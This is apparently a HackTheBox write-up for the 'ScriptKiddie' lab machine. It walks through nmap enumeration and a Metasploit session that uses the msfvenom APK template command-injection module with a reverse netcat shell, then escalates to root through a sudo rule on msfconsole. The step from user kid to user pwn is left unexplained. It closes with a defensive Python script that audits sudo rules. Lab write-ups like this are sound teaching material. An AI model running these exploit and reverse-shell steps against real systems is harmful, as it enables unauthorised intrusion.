ScriptKiddie Writeup

Reconnaissance & Enumeration

As usual, I started by enumerating the machine.

# Nmap 7.91 scan initiated Sun Mar  7 12:11:35 2021 as: nmap -v -sC -sV -oN nmap -p- scriptkiddie.htb
Nmap scan report for scriptkiddie.htb (10.10.10.226)
Host is up (0.070s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods:
|_  Supported Methods: POST GET OPTIONS HEAD
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar  7 12:12:17 2021 -- 1 IP address (1 host up) scanned in 41.65 seconds

Nmap has found a web server on port 5000 and SSH on port 22. Let us visit the website. Looking at the page, the host exposes some interesting programs to the user.

The first thing I tried was command injection, but it did not quite work.

Getting user

After giving up on command injection, I started to search for exploits in the tools provided by the server. Using searchsploit I found an exploit related to msfvenom, which was fairly new at the time the box was released, so having the newest versions of searchsploit and msf was necessary.

┌──(kali㉿kali)-[~/Desktop/ScriptKiddie]
└─$ searchsploit msfvenom
-------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                  |  Path
-------------------------------------------------------------------------------- ---------------------------------
Metasploit Framework 6.0.11 - msfvenom APK template command injection           | multiple/local/49491.py
-------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Metasploit has a module for the exploit. Let us use it.

After setting the options and running the module we get an .apk file, which msfvenom on the target machine will use as a template.

msf6 > search msfvenom

Matching Modules
================

   #  Name                                                                    Disclosure Date  Rank       Check  Description
   -  ----                                                                    ---------------  ----       -----  -----------
   0  exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection  2020-10-29       excellent  No     Rapid7 Metasploit Framework msfvenom APK Template Command Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST tun0
LHOST => tun0
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 4444
LPORT => 4444
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run

[+] msf.apk stored at /root/.msf4/local/msf.apk
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) >

Now let us upload this apk and start a listener on the port we have set in the msfconsole.

After clicking generate we should get a reverse shell as the user kid. In that user's home folder we can grab the user flag.

Getting root

After doing some basic Linux privilege escalation enumeration I found out that the user “pwn” can run msfconsole with sudo. From msfconsole we can easily read files, spawn bash and so on, so at this point we can easily grab the root flag.
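As an added defender-side check (not part of the original writeup), the script below parses `sudo -l` output and flags rules that hand a shell-capable program such as msfconsole to another user, which is exactly the misconfiguration that gives root here. The sample output, the msfconsole path and the list of shell-capable tools are constructed assumptions of this example, not values taken from the box.

```python
import os
import re
from dataclasses import dataclass

# Programs that let the caller open a shell or read arbitrary files once
# they run as root. Assumed list for this example; extend for your estate.
SHELL_CAPABLE = {
    "msfconsole", "msfvenom", "vim", "vi", "less", "more", "find",
    "awk", "perl", "python", "python3", "ruby", "bash", "sh",
}

# Constructed `sudo -l` output modelled on the box; the msfconsole
# install path is an assumption.
SAMPLE_SUDO_L = """\
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/bin\\:/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework/msfconsole
    (root) /usr/bin/apt-get update
"""

@dataclass
class Finding:
    user: str
    runas: str
    nopasswd: bool
    command: str

_USER_RE = re.compile(r"^User (\S+) may run the following commands")
_ENTRY_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.*)$")

def audit_sudo_l(output: str) -> list[Finding]:
    """Return sudo rules that grant a shell-capable program (or ALL)."""
    findings, user = [], None
    for line in output.splitlines():
        m = _USER_RE.match(line)
        if m:
            user = m.group(1)
            continue
        if user is None:
            continue  # still inside the "Defaults" preamble
        m = _ENTRY_RE.match(line)
        if not m:
            continue
        runas, tags, cmds = m.groups()
        nopasswd = "NOPASSWD:" in tags
        for cmd in (c.strip() for c in cmds.split(",")):
            if not cmd:
                continue
            prog = os.path.basename(cmd.split()[0])  # first token, e.g. msfconsole
            if cmd == "ALL" or prog in SHELL_CAPABLE:
                findings.append(Finding(user, runas, nopasswd, cmd))
    return findings
```

Run it against real `sudo -l` output from each host; any hit for a tool like msfconsole should be replaced with a narrower rule or removed.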